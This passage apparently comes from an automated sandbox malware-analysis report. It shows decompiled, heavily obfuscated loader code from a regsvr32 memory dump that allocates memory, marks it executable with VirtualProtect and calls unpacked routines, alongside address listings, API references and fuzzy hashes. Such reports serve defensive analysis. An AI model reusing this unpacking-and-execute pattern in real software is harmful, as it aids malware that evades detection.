					_t1147 = _t1145 & 0x00000000 | _t1238 -  *_t1456 ^  *(_t1064 + 0x45fc25);
					_t1245 = _t1238;
					if(_t1147 > _t898) {
						_v16 = _v16 & 0x00000000;
						 *_t1456 =  *_t1456 + _t1064 + 0x45f60e;
						_v16 = _v16 & 0x00000000;
						 *_t1456 =  *_t1456 ^ _t1064 + 0x0045f244;
						_t923 =  *((intOrPtr*)(_t1064 + 0x46002c))(_v16, _v16);
						_push(0);
						 *_t1456 = _t1245;
						 *(_t1064 + 0x45f98c) = 0 ^ _t923;
					}
					_pop( *_t631);
					_t1247 = 0 ^ _v20;
					 *_t634 =  *(_t1064 + 0x45f9b2);
					_push(_v12);
					_pop(_t1320);
					 *(_t1064 + 0x45f74e) = 0x40;
					 *_t1456 =  *_t1456 & 0x00000000;
					 *_t1456 =  *_t1456 ^ _t1247;
					_v12 = 0;
					 *_t1456 =  *_t1456 ^ _t1064 + 0x0045fc00;
					_t900 =  *((intOrPtr*)(_t1064 + 0x460028))(_v12, _t1147);
					 *_t1456 =  *_t1456 & 0x00000000;
					 *_t1456 =  *_t1456 ^ _t900;
					_v20 = _v20 & 0x00000000;
					 *_t1456 =  *_t1456 ^ _t1064 + 0x0045fa4e;
					_t902 =  *((intOrPtr*)(_t1064 + 0x460028))(_v20, _t1064);
					_pop( *_t646);
					 *_t648 = _t902;
					_v12 = _v12 + (_t1147 & 0x00000000 | _v16);
					_push(_v12);
					_pop(_t903);
					_t1064 = _t1064;
					_push( *((intOrPtr*)(_t1064 + 0x45f13f)));
					_pop( *_t653);
					_push(_v12);
					_pop(_t1150);
					if(_t1150 > _t903) {
						_t655 = _t1064 + 0x45fc00; // 0x45fc00
						 *_t1456 =  *_t1456 & 0x00000000;
						 *_t1456 =  *_t1456 + _t655;
						_t656 = _t1064 + 0x45fa4e; // 0x45fa4e
						 *_t1456 =  *_t1456 & 0x00000000;
						 *_t1456 =  *_t1456 + _t656;
						_t920 =  *((intOrPtr*)(_t1064 + 0x46002c))(_t1425, _t1247);
						_v16 = _t1320;
						 *(_t1064 + 0x45fd8a) =  *(_t1064 + 0x45fd8a) & 0x00000000;
						 *(_t1064 + 0x45fd8a) =  *(_t1064 + 0x45fd8a) | _t1320 - _v16 | _t920;
						_t1320 = _v16;
					}
					_pop( *_t665);
					_t1248 = _v20;
					_t667 = _t1064 + 0x45f74e; // 0x45f74e
					 *_t1456 = _t667;
					 *_t1456 = _t1248;
					_t670 = _t1064 + 0x45f8ac; // 0x45f8ac
					_v20 = 0;
					 *_t1456 =  *_t1456 | _t670;
					_t906 =  *((intOrPtr*)(_t1064 + 0x460028))(_v20, _v16, _v16);
					_v20 = _v20 & 0x00000000;
					 *_t1456 =  *_t1456 ^ _t906;
					_t677 = _t1064 + 0x45f9fd; // 0x45f9fd
					 *_t1456 = _t677;
					_t908 =  *((intOrPtr*)(_t1064 + 0x460028))(_v12, _v20);
					_pop( *_t680);
					_t1152 = 0 ^ _v20;
					 *_t682 = _t908;
					_v16 = _v16 + _t1152;
					_push(_v16);
					_pop(_t909);
					_t1305 = _t1320;
					_t1154 = _t1152 & 0x00000000 | _t1376 & 0x00000000 |  *(_t1064 + 0x45f3e3);
					_t1363 = _t1376;
					if(_t1154 > _t909) {
						_t687 = _t1064 + 0x45f8ac; // 0x45f8ac
						 *_t1456 =  *_t1456 - _t1425;
						 *_t1456 =  *_t1456 | _t687;
						_t688 = _t1064 + 0x45f9fd; // 0x45f9fd
						 *_t1456 = _t688;
						_t917 =  *((intOrPtr*)(_t1064 + 0x46002c))(_v16, _t1425);
						_v12 = _t1154;
						 *(_t1064 + 0x45fc35) =  *(_t1064 + 0x45fc35) & 0x00000000;
						 *(_t1064 + 0x45fc35) =  *(_t1064 + 0x45fc35) | _t1154 & 0x00000000 ^ _t917;
					}
					_t1238 = (_t1248 & 0x00000000) +  *_t1456;
					_t1457 = _t1456 - 0xfffffffc;
					_t1450 = _t1457 - 0xfffffffc;
					_v16 = _v16 & 0x00000000;
					_push(_v16);
					 *_t1450 =  *_t1450 ^ 0 ^  *_t1457;
					_push(2);
					if( *((intOrPtr*)(_t1064 + 0x45faa0)) == 0) {
						 *_t1450 =  *_t1450 & 0x00000000;
						 *_t1450 =  *_t1450 | _t1238;
						_push( *((intOrPtr*)(_t1064 + 0x460024))( *((intOrPtr*)(_t1064 + 0x45f786)), _t1363));
						_pop( *_t703);
						_push(_v20);
						_pop( *_t705);
						_t1238 = _t1238 & 0x00000000 |  *_t1450;
						_t1450 = _t1450 - 0xfffffffc;
					}
					_v16 = _v16 & 0x00000000;
					_push(_v16);
					 *_t1450 =  *_t1450 | _t1238;
					_push(_t1238);
					 *_t1450 =  *_t1450 - _t1238;
					 *_t1450 = _t1305;
					if( *(_t1064 + 0x45f2b4) == 0) {
						_t913 =  *((intOrPtr*)(_t1064 + 0x460024))(0xfffffcb3);
						_v12 = _t1363;
						 *(_t1064 + 0x45f2b4) = 0 ^ _t913;
						_t1363 = _v12;
					}
					VirtualProtect();
					goto L85;
				}
			}

0x00b32559
0x00b32559
0x00b32559
0x00b32559
0x00b32559
0x00b32559
0x00b3255a
0x00b3255e
0x00b32561
0x00b32563
0x00b3256d
0x00b3256f
0x00b32570
0x00b32574
0x00b32577
0x00b32578
0x00b3257c
0x00b3257f
0x00b32585
0x00b3258b
0x00b32591
0x00b32598
0x00b325a1
0x00b325a4
0x00b325a9
0x00b325ac
0x00b325ac
0x00b325b6
0x00b325c3
0x00b325c6
0x00b325c9
0x00b325cd
0x00b325d0
0x00b325d9
0x00b325df
0x00b325e7
0x00b325ee
0x00b325f4
0x00b325f9
0x00b325fc
0x00b32601
0x00b32604
0x00b32604
0x00b3260a
0x00b3260e
0x00b32612
0x00b3261b
0x00b32622
0x00b32625
0x00b3262c
0x00b32630
0x00b3263a
0x00b3263d
0x00b32640
0x00b3264c
0x00b3264f
0x00b32652
0x00b32659
0x00b3265a
0x00b3265d
0x00b3266b
0x00b3266d
0x00b32670
0x00b32679
0x00b3267d
0x00b32687
0x00b3268b
0x00b3268e
0x00b3268e
0x00b3269a
0x00b326a1
0x00b326a7
0x00b326b1
0x00b326b4
0x00b326b7
0x00b326bd
0x00b326c7
0x00b326d0
0x00b326da
0x00b326dd
0x00b326e9
0x00b326ec
0x00b326f3
0x00b326f6
0x00b326f9
0x00b326fc
0x00b326fd
0x00b3270b
0x00b3270d
0x00b32710
0x00b32719
0x00b3271c
0x00b32728
0x00b3272b
0x00b3272b
0x00b32733
0x00b3273a
0x00b32740
0x00b32741
0x00b32748
0x00b3274b
0x00b32757
0x00b3275a
0x00b32761
0x00b32765
0x00b3276f
0x00b32772
0x00b32775
0x00b32784
0x00b32787
0x00b3278e
0x00b3278f
0x00b32792
0x00b32793
0x00b32799
0x00b3279c
0x00b3279f
0x00b327a2
0x00b327aa
0x00b327b1
0x00b327bb
0x00b327be
0x00b327c1
0x00b327c7
0x00b327cf
0x00b327d6
0x00b327dc
0x00b327dc
0x00b327e4
0x00b327e8
0x00b327eb
0x00b327ee
0x00b327fb
0x00b32803
0x00b32809
0x00b3280b
0x00b32812
0x00b32818
0x00b3281b
0x00b3281e
0x00b32821
0x00b32827
0x00b32831
0x00b32834
0x00b3283e
0x00b32848
0x00b3284b
0x00b3284e
0x00b32855
0x00b32858
0x00b32864
0x00b32867
0x00b3286d
0x00b32870
0x00b32877
0x00b3287a
0x00b3287d
0x00b32880
0x00b32881
0x00b32882
0x00b32891
0x00b32893
0x00b32898
0x00b328a0
0x00b328aa
0x00b328b3
0x00b328ba
0x00b328bd
0x00b328c3
0x00b328cb
0x00b328d2
0x00b328d8
0x00b328e1
0x00b328e4
0x00b328e9
0x00b328ec
0x00b328ec
0x00b328f2
0x00b328f6
0x00b328f9
0x00b32903
0x00b32907
0x00b3290a
0x00b32910
0x00b32917
0x00b32920
0x00b32927
0x00b3292a
0x00b32936
0x00b32940
0x00b32943
0x00b32946
0x00b32949
0x00b3294a
0x00b3294b
0x00b32956
0x00b32958
0x00b3295d
0x00b32966
0x00b3296a
0x00b32973
0x00b3297d
0x00b32980
0x00b32980
0x00b32986
0x00b3298c
0x00b32993
0x00b329a0
0x00b329a7
0x00b329aa
0x00b329b4
0x00b329bf
0x00b329c2
0x00b329c5
0x00b329c5
0x00b329cb
0x00b329d2
0x00b329d5
0x00b329de
0x00b329e8
0x00b329eb
0x00b329f1
0x00b329f8
0x00b32a04
0x00b32a07
0x00b32a0d
0x00b32a10
0x00b32a15
0x00b32a19
0x00b32a1c
0x00b32a1e
0x00b32a1f
0x00b32a2e
0x00b32a30
0x00b32a35
0x00b32a40
0x00b32a49
0x00b32a53
0x00b32a56
0x00b32a56
0x00b32a62
0x00b32a69
0x00b32a6f
0x00b32a77
0x00b32a7a
0x00b32a84
0x00b32a88
0x00b32a8b
0x00b32a92
0x00b32a95
0x00b32a9f
0x00b32aa3
0x00b32aa6
0x00b32ab2
0x00b32ab5
0x00b32ab8
0x00b32abf
0x00b32ac0
0x00b32ac3
0x00b32ad1
0x00b32ad3
0x00b32ad6
0x00b32ad8
0x00b32adf
0x00b32ae3
0x00b32ae6
0x00b32aec
0x00b32af6
0x00b32af9
0x00b32af9
0x00b32b01
0x00b32b08
0x00b32b0e
0x00b32b0f
0x00b32b1c
0x00b32b1e
0x00b32b28
0x00b32b2c
0x00b32b30
0x00b32b33
0x00b32b39
0x00b32b3f
0x00b32b46
0x00b32b53
0x00b32b56
0x00b32b56
0x00b32b5b
0x00b32b5e
0x00b32b65
0x00b32b68
0x00b32b6b
0x00b32b6e
0x00b32b6f
0x00b32b77
0x00b32b7a
0x00b32b7d
0x00b32b86
0x00b32b8e
0x00b32b95
0x00b32b9b
0x00b32ba2
0x00b32ba5
0x00b32ba5
0x00b32bb7
0x00b32bba
0x00b32bc7
0x00b32bcb
0x00b32bd3
0x00b32bda
0x00b32be0
0x00b32be0
0x00b32be1
0x00b32be8
0x00b32bec
0x00b32bef
0x00b32bf6
0x00b32bfa
0x00b32bfd
0x00b32c04
0x00b32c08
0x00b32c0b
0x00b32c11
0x00b32c1b
0x00b32c1e
0x00b32c29
0x00b32c2e
0x00b32c32
0x00b32c37
0x00b32c38
0x00b32c43
0x00b32c45
0x00b32c4a
0x00b32c4c
0x00b32c53
0x00b32c56
0x00b32c59
0x00b32c5f
0x00b32c66
0x00b32c69
0x00b32c6f
0x00b32c76
0x00b32c7c
0x00b32c7c
0x00b32c85
0x00b32c8b
0x00b32c8c
0x00b32c90
0x00b32c93
0x00b32c93
0x00b32ca0
0x00b32ca3
0x00b32ca6
0x00b32cae
0x00b32cb4
0x00b32cba
0x00b32cc1
0x00b32cca
0x00b32ccd
0x00b32ccd
0x00b32cd3
0x00b32cd6
0x00b32cdc
0x00b32ce6
0x00b32ce9
0x00b32cef
0x00b32cf6
0x00b32cf9
0x00b32d02
0x00b32d05
0x00b32d0b
0x00b32d12
0x00b32d15
0x00b32d1d
0x00b32d20
0x00b32d27
0x00b32d2a
0x00b32d2d
0x00b32d30
0x00b32d31
0x00b32d32
0x00b32d41
0x00b32d43
0x00b32d48
0x00b32d4a
0x00b32d50
0x00b32d5a
0x00b32d5d
0x00b32d63
0x00b32d6d
0x00b32d70
0x00b32d76
0x00b32d7e
0x00b32d85
0x00b32d8b
0x00b32d8b
0x00b32d90
0x00b32d96
0x00b32d9e
0x00b32da5
0x00b32dab
0x00b32dae
0x00b32db7
0x00b32dba
0x00b32dc1
0x00b32dc5
0x00b32dc8
0x00b32dce
0x00b32dd5
0x00b32dd8
0x00b32de7
0x00b32dec
0x00b32df0
0x00b32df3
0x00b32df5
0x00b32df6
0x00b32e03
0x00b32e08
0x00b32e0a
0x00b32e11
0x00b32e14
0x00b32e17
0x00b32e1e
0x00b32e21
0x00b32e24
0x00b32e24
0x00b32e2c
0x00b32e33
0x00b32e39
0x00b32e39
0x00b32e43
0x00b32e49
0x00b32e4c
0x00b32e55
0x00b32e58
0x00b32e5f
0x00b32e62
0x00b32e65
0x00b32e6e
0x00b32e71
0x00b32e77
0x00b32e7d
0x00b32e84
0x00b32e85
0x00b32e88
0x00b32e89
0x00b32e8f
0x00b32e92
0x00b32e95
0x00b32e98
0x00b32ea1
0x00b32ea4
0x00b32eae
0x00b32eb2
0x00b32eb5
0x00b32ebb
0x00b32ec3
0x00b32eca
0x00b32ed0
0x00b32ed0
0x00b32ed9
0x00b32edc
0x00b32edf
0x00b32ee0
0x00b32ee4
0x00b32ee7
0x00b32ef3
0x00b32ef5
0x00b32eff
0x00b32f01
0x00b32f08
0x00b32f0e
0x00b32f17
0x00b32f1d
0x00b32f24
0x00b32f33
0x00b32f36
0x00b32f3f
0x00b32f42
0x00b32f42
0x00b32f4c
0x00b32f59
0x00b32f5e
0x00b32f61
0x00b32f68
0x00b32f71
0x00b32f77
0x00b32f7f
0x00b32f86
0x00b32f8c
0x00b32f91
0x00b32f94
0x00b32f99
0x00b32f9c
0x00b32f9c
0x00b32fa0
0x00b32fa4
0x00b32fa8
0x00b32fab
0x00b32fb5
0x00b32fb9
0x00b32fbc
0x00b32fc5
0x00b32fce
0x00b32fd8
0x00b32fdb
0x00b32fe3
0x00b32feb
0x00b32fef
0x00b32ff4
0x00b32ff5
0x00b33006
0x00b3300b
0x00b33013
0x00b3301d
0x00b33026
0x00b33030
0x00b33039
0x00b3303a
0x00b3303d
0x00b33040
0x00b33040
0x00b33046
0x00b33049
0x00b3304d
0x00b33051
0x00b33054
0x00b3305b
0x00b3305f
0x00b33068
0x00b3306f
0x00b33072
0x00b33079
0x00b3307d
0x00b33086
0x00b3308d
0x00b33090
0x00b3309c
0x00b3309f
0x00b330a2
0x00b330a9
0x00b330aa
0x00b330ad
0x00b330bb
0x00b330bd
0x00b330c0
0x00b330c9
0x00b330cd
0x00b330d7
0x00b330db
0x00b330de
0x00b330e4
0x00b330eb
0x00b330f1
0x00b330f1
0x00b330fd
0x00b33106
0x00b3310d
0x00b33113
0x00b3311b
0x00b3312a
0x00b3312d
0x00b33130
0x00b33130
0x00b33136
0x00b3313d
0x00b33140
0x00b33149
0x00b33150
0x00b33153
0x00b3315c
0x00b33166
0x00b33169
0x00b3316c
0x00b33178
0x00b33180
0x00b33184
0x00b33189
0x00b3318a
0x00b33190
0x00b33193
0x00b33196
0x00b33199
0x00b331a4
0x00b331ae
0x00b331b1
0x00b331ba
0x00b331bb
0x00b331be
0x00b331c1
0x00b331c1
0x00b331c7
0x00b331ca
0x00b331ca
0x00b331cd
0x00b331d9
0x00b331dd
0x00b331e1
0x00b331e5
0x00b331ef
0x00b331f2
0x00b331f5
0x00b331fe
0x00b33207
0x00b3320e
0x00b33211
0x00b33219
0x00b3321f
0x00b33226
0x00b33227
0x00b3322a
0x00b3322b
0x00b33231
0x00b33234
0x00b33237
0x00b3323a
0x00b33242
0x00b3324c
0x00b33255
0x00b3325f
0x00b33262
0x00b33268
0x00b3326f
0x00b33275
0x00b33275
0x00b3327d
0x00b33280
0x00b33287
0x00b33293
0x00b33296
0x00b33299
0x00b332a0
0x00b332a3
0x00b332ad
0x00b332b1
0x00b332b4
0x00b332bf
0x00b332c6
0x00b332c9
0x00b332cc
0x00b332cf
0x00b332d0
0x00b332d3
0x00b332e0
0x00b332e3
0x00b332e5
0x00b332ec
0x00b332f0
0x00b332f3
0x00b332fa
0x00b332fe
0x00b33301
0x00b33301
0x00b3330d
0x00b33314
0x00b3331a
0x00b3331f
0x00b33327
0x00b3332b
0x00b3332e
0x00b33331
0x00b3333a
0x00b3333d
0x00b33346
0x00b33349
0x00b33350
0x00b33353
0x00b33356
0x00b3335c
0x00b33362
0x00b33369
0x00b3336a
0x00b3336d
0x00b33370
0x00b3337b
0x00b3337d
0x00b33380
0x00b3338b
0x00b33395
0x00b33398
0x00b3339b
0x00b3339b
0x00b333a1
0x00b333a8
0x00b333b1
0x00b333b8
0x00b333c1
0x00b333c8
0x00b333cb
0x00b333d2
0x00b333d5
0x00b333de
0x00b333e5
0x00b333e8
0x00b333f4
0x00b333f7
0x00b333fe
0x00b33401
0x00b33404
0x00b33407
0x00b33408
0x00b33416
0x00b33418
0x00b3341b
0x00b33424
0x00b33428
0x00b33432
0x00b33436
0x00b33439
0x00b33439
0x00b33440
0x00b33443
0x00b33446
0x00b33456
0x00b33458
0x00b33460
0x00b33462
0x00b3346c
0x00b33475
0x00b33481
0x00b33488
0x00b33495
0x00b33498
0x00b33498
0x00b3349d
0x00b334a8
0x00b334aa
0x00b334ab
0x00b334b7
0x00b334bd
0x00b334c1
0x00b334cd
0x00b334d0
0x00b334d6
0x00b334e0
0x00b334e9
0x00b334f3
0x00b334f6
0x00b334fe
0x00b33501
0x00b33506
0x00b3350a
0x00b3350f
0x00b33510
0x00b3351f
0x00b33521
0x00b33526
0x00b3352e
0x00b33535
0x00b3353f
0x00b33542
0x00b33545
0x00b33551
0x00b33558
0x00b3355e
0x00b3355e
0x00b33565
0x00b33568
0x00b3356b
0x00b33576
0x00b33578
0x00b33582
0x00b33587
0x00b3358b
0x00b3358e
0x00b33599
0x00b3359a
0x00b3359d
0x00b335a0
0x00b335a8
0x00b335ab
0x00b335b0
0x00b335b3
0x00b335b3
0x00b335b8
0x00b338c2
0x00b338c8
0x00b338cb
0x00b338ce
0x00b338d4
0x00b338db
0x00b338de
0x00b338e5
0x00b338e8
0x00b338eb
0x00b338f2
0x00b338f5
0x00b338f8
0x00b33903
0x00b33908
0x00b3390c
0x00b3390f
0x00b33911
0x00b33914
0x00b3391f
0x00b33921
0x00b33924
0x00b33926
0x00b3392c
0x00b33933
0x00b33936
0x00b3393f
0x00b33942
0x00b33942
0x00b33949
0x00b3394c
0x00b3394f
0x00b33955
0x00b3395e
0x00b33961
0x00b33961
0x00b33962
0x00b33966
0x00b33970
0x00b33974
0x00b33980
0x00b33987
0x00b3398d
0x00b3398d
0x00b33990
0x00b33998
0x00b3399a
0x00b339a2
0x00b339aa
0x00b339b2
0x00b339b9
0x00b339bf
0x00b339bf
0x00b339c0
0x00b339c8
0x00b339cd
0x00b339d5
0x00b339d6
0x00b339d9
0x00b339e1
0x00b339e4
0x00b339e8
0x00b339eb
0x00b339f5
0x00b339f8
0x00b339fe
0x00b33a06
0x00b33a0d
0x00b33a13
0x00b33a1c
0x00b33a1f
0x00b33a1f
0x00b33a25
0x00b33a30
0x00b33a31
0x00b33a34
0x00b33a35
0x00b33a3c
0x00b33a46
0x00b33a4a
0x00b33a4d
0x00b33a54
0x00b33a57
0x00b33a61
0x00b33a64
0x00b33a67
0x00b33a73
0x00b33a76
0x00b33a79
0x00b33a80
0x00b33a81
0x00b33a84
0x00b33a94
0x00b33a97
0x00b33aa0
0x00b33aa3
0x00b33aaf
0x00b33ab8
0x00b33ab9
0x00b33abc
0x00b33abf
0x00b33abf
0x00b33acd
0x00b33acd
0x00b33acf
0x00b33ade
0x00b33ae0
0x00b33ae1
0x00b33ae1
0x00b33ae1
0x00b33aea
0x00b33aed
0x00b33af3
0x00b33af6
0x00b33afa
0x00b33b05
0x00b33b06
0x00b33b09
0x00b33b10
0x00b33b17
0x00b33b1d
0x00b33b24
0x00b33b27
0x00b33b2a
0x00b33b2e
0x00b33b31
0x00b33b34
0x00b33b37
0x00b33b3c
0x00b33b43
0x00b33b46
0x00b33b46
0x00b33b4b
0x00b33b53
0x00b33b5a
0x00b335be
0x00b335c5
0x00b335c7
0x00b335d1
0x00b335d4
0x00b335db
0x00b335e4
0x00b335ea
0x00b335f2
0x00b335f9
0x00b33608
0x00b3360b
0x00b33610
0x00b33613
0x00b33613
0x00b33616
0x00b33616
0x00b33617
0x00b33617
0x00b3361a
0x00b33621
0x00b3362b
0x00b3362f
0x00b33632
0x00b33638
0x00b33642
0x00b3364c
0x00b33650
0x00b33653
0x00b3365f
0x00b33662
0x00b33669
0x00b3366c
0x00b3366f
0x00b33672
0x00b33673
0x00b33681
0x00b33683
0x00b33686
0x00b3368e
0x00b33695
0x00b3369e
0x00b336a5
0x00b336a8
0x00b336ae
0x00b336b0
0x00b336b7
0x00b336bd
0x00b336c0
0x00b336c3
0x00b336cc
0x00b336cf
0x00b336d2
0x00b336d3
0x00b336de
0x00b336e2
0x00b336eb
0x00b336f5
0x00b336f8
0x00b336ff
0x00b33703
0x00b3370c
0x00b33713
0x00b33716
0x00b33722
0x00b3372c
0x00b3372f
0x00b33732
0x00b33735
0x00b33736
0x00b33737
0x00b3373d
0x00b33740
0x00b33743
0x00b33746
0x00b33748
0x00b3374f
0x00b33753
0x00b33756
0x00b3375d
0x00b33761
0x00b33764
0x00b3376a
0x00b33772
0x00b33779
0x00b3377f
0x00b3377f
0x00b33782
0x00b33785
0x00b33788
0x00b33791
0x00b33797
0x00b3379a
0x00b337a0
0x00b337aa
0x00b337ad
0x00b337b3
0x00b337ba
0x00b337bd
0x00b337c6
0x00b337c9
0x00b337d1
0x00b337d4
0x00b337db
0x00b337de
0x00b337e1
0x00b337e4
0x00b337e5
0x00b337f3
0x00b337f5
0x00b337f8
0x00b337fa
0x00b33801
0x00b33804
0x00b33807
0x00b33810
0x00b33813
0x00b33819
0x00b33821
0x00b33828
0x00b3382e
0x00b33837
0x00b3383a
0x00b33842
0x00b33845
0x00b33849
0x00b3384c
0x00b3384f
0x00b33858
0x00b3385b
0x00b3385f
0x00b3386e
0x00b3386f
0x00b33872
0x00b33875
0x00b33881
0x00b33884
0x00b33884
0x00b33887
0x00b3388b
0x00b3388e
0x00b33891
0x00b33892
0x00b33895
0x00b3389f
0x00b338a6
0x00b338ac
0x00b338b3
0x00b338b9
0x00b338b9
0x00b338bc
0x00000000
0x00b338bc

APIs

VirtualProtect.KERNELBASE(?,?,00000002,?), ref: 00B338BC

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3c960e9bdcded85e7a7fb33da9b43af80de3d9a3bfc593a589c53935d52d5383
Instruction ID: 41b1f7300c150f60af7c37c9965d5b5500c122d82a866f5a0db3106e2a56259f
Opcode Fuzzy Hash: 3c960e9bdcded85e7a7fb33da9b43af80de3d9a3bfc593a589c53935d52d5383
Instruction Fuzzy Hash: C6F26E72804608EFEF049FA4D8897AEBBF1FF08322F0544ADDC859A146D77455A4CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00B34CC2, Relevance: 3.0, APIs: 1, Instructions: 1510
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e43281454713ccecbb4630c3fdd7cb49355d935b0fc6c1c18b9f09e6cd413803
Instruction ID: 763eb75c2acb399471c57a95448f6e82207d703fb14559cb1042a859edde0de8
Opcode Fuzzy Hash: e43281454713ccecbb4630c3fdd7cb49355d935b0fc6c1c18b9f09e6cd413803
Instruction Fuzzy Hash: 70E26B72804609DFEF04DFA0C9897AEBBF0FF08312F15446DD889AA146D7745968CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00B3572B, Relevance: 2.2, APIs: 1, Instructions: 686
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed4710fa2665699511911c826ec48d52fa89adff54f3e093a9b468fd40989579
Instruction ID: c30d2c71bd034971557368e4a832a9bf2901beffab757b7341970da29c4e24f0
Opcode Fuzzy Hash: ed4710fa2665699511911c826ec48d52fa89adff54f3e093a9b468fd40989579
Instruction Fuzzy Hash: 8E628B72804609DFEF04DFA0C9897AEBBF0FF08322F15446DDC89AA146D7745A64CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00B358C5, Relevance: 2.2, APIs: 1, Instructions: 656
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000,00000000), ref: 00B35BE4

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2aea56ad7f3848597a150a40f1649395ab8568c1456e06347cc4ae985b18d6e0
Instruction ID: 7017b4c9968f77b1ae166b2236e8828a322b2f9fb78e5a3c4bb4d35bb047a05f
Opcode Fuzzy Hash: 2aea56ad7f3848597a150a40f1649395ab8568c1456e06347cc4ae985b18d6e0
Instruction Fuzzy Hash: D7527972804609DFEF04DFA0C9897AEBBF0FF08311F15486EDC89AA146D7745A64CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00B348FB, Relevance: 3.1, APIs: 2, Instructions: 79
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E00B348FB(signed int __ebx, signed int __ecx, signed int __edx, void* __edi, DWORD* __esi, void* __eflags) {
				void* _t28;
				signed int _t29;
				int _t30;
				void* _t31;
				signed int _t35;
				signed int _t36;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				signed int _t44;
				signed int _t47;
				signed int _t51;
				void* _t52;
				signed int _t53;
				intOrPtr _t56;
				DWORD* _t60;
				void* _t61;
				signed int* _t63;

				_t60 = __esi;
				_t50 = __edi;
				_t41 = __edx;
				_t37 = __ecx;
				_t35 = __ebx;
				_t29 = E00B33BEF(_t28, __ecx, __edx, __edi, __esi);
				 *_t63 =  *_t63 | _t35;
				_t36 = _t35;
				if( *_t63 != 0) {
					_t29 = VirtualAlloc(0,  *(_t36 + 0x45f0af), 0x1000, 4);
				}
				 *(_t61 - 4) = 0;
				_push( *(_t61 - 4));
				 *_t63 =  *_t63 + _t29;
				_pop( *_t5);
				 *((intOrPtr*)(_t36 + 0x45f74e)) = 2;
				 *_t63 = _t41;
				 *(_t36 + 0x45f75a) = 0 ^ _t29;
				_t44 = 0;
				if( *(_t36 + 0x45f9b2) > 0) {
					 *_t63 =  *_t63 & 0x00000000;
					 *_t63 =  *_t63 + _t36 + 0x45f74e;
					_t29 = VirtualProtect( *(_t36 + 0x45f9b2),  *(_t36 + 0x45facc), 0x40, _t60);
				}
				if(_t29 != _t36) {
					_t29 = E00B33E7B(_t36, _t37, _t44, _t50, _t60,  *((intOrPtr*)(_t36 + 0x45f5ea)),  *((intOrPtr*)(_t36 + 0x45f013)));
				}
				_t39 = _t37 & 0x00000000 ^ _t44 & 0x00000000 ^  *(_t36 + 0x45facc);
				_t47 = _t44;
				 *_t17 =  *(_t36 + 0x45f9b2);
				_t51 =  *((intOrPtr*)(_t61 - 0xc));
				 *_t63 =  *_t63 | _t51;
				_t52 = _t51;
				if( *_t63 != 0) {
					 *_t63 =  *_t63 & 0x00000000;
					 *_t63 = _t52 +  *_t63;
					_t29 = E00B33CA2(_t29, _t36, _t39, _t47, _t52, _t60, _t60);
				}
				 *_t63 =  *_t63 ^ _t29;
				_t30 = _t29;
				_t31 = memset(_t52, _t30, _t39 << 0);
				_t53 = _t52 + _t39;
				if( *((intOrPtr*)(_t36 + 0x45f013)) != _t36) {
					 *((intOrPtr*)(_t36 + 0x460010))();
					E00B32559(_t36, 0, _t47, _t53, _t60,  *((intOrPtr*)(_t36 + 0x45f013))); // executed
					_t31 = E00B31000(_t36, _t47, _t53, _t60,  *((intOrPtr*)(_t36 + 0x45f013)));
				}
				_t56 = _t53;
				 *((intOrPtr*)(_t61 - 8)) = _t56;
				 *(_t61 + 4) = _t47 & 0x00000000 | _t53 & 0x00000000 ^  *(_t36 + 0x45fdd9);
				asm("popad");
				return _t31;
			}

0x00b348fb
0x00b348fb
0x00b348fb
0x00b348fb
0x00b348fb
0x00b348fb
0x00b34901
0x00b34904
0x00b34905
0x00b34916
0x00b34916
0x00b3491c
0x00b34923
0x00b34926
0x00b34929
0x00b3492f
0x00b3493b
0x00b34942
0x00b34948
0x00b34950
0x00b34959
0x00b3495d
0x00b3496e
0x00b3496e
0x00b34976
0x00b34984
0x00b34984
0x00b34996
0x00b34998
0x00b3499f
0x00b349a5
0x00b349a7
0x00b349aa
0x00b349ab
0x00b349ae
0x00b349b2
0x00b349b5
0x00b349b5
0x00b349bb
0x00b349be
0x00b349bf
0x00b349bf
0x00b349c7
0x00b349c9
0x00b349d5
0x00b349e0
0x00b349e0
0x00b349f4
0x00b349f5
0x00b349fc
0x00b34a02
0x00b34a04

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00B34916
VirtualProtect.KERNELBASE(?,?,00000040,?,00000000), ref: 00B3496E

Memory Dump Source

Source File: 00000003.00000002.253131665.0000000000B30000.00000040.00000001.sdmp, Offset: 00B30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: db3949677fc4233067a72ea4cddc60e1933a77edbdbe215182f2af243945d636
Instruction ID: 5f1e68064c5026b350493c5d6fc99bd1bbfcff30c2d5d2c56b12d812c2938ba2
Opcode Fuzzy Hash: db3949677fc4233067a72ea4cddc60e1933a77edbdbe215182f2af243945d636
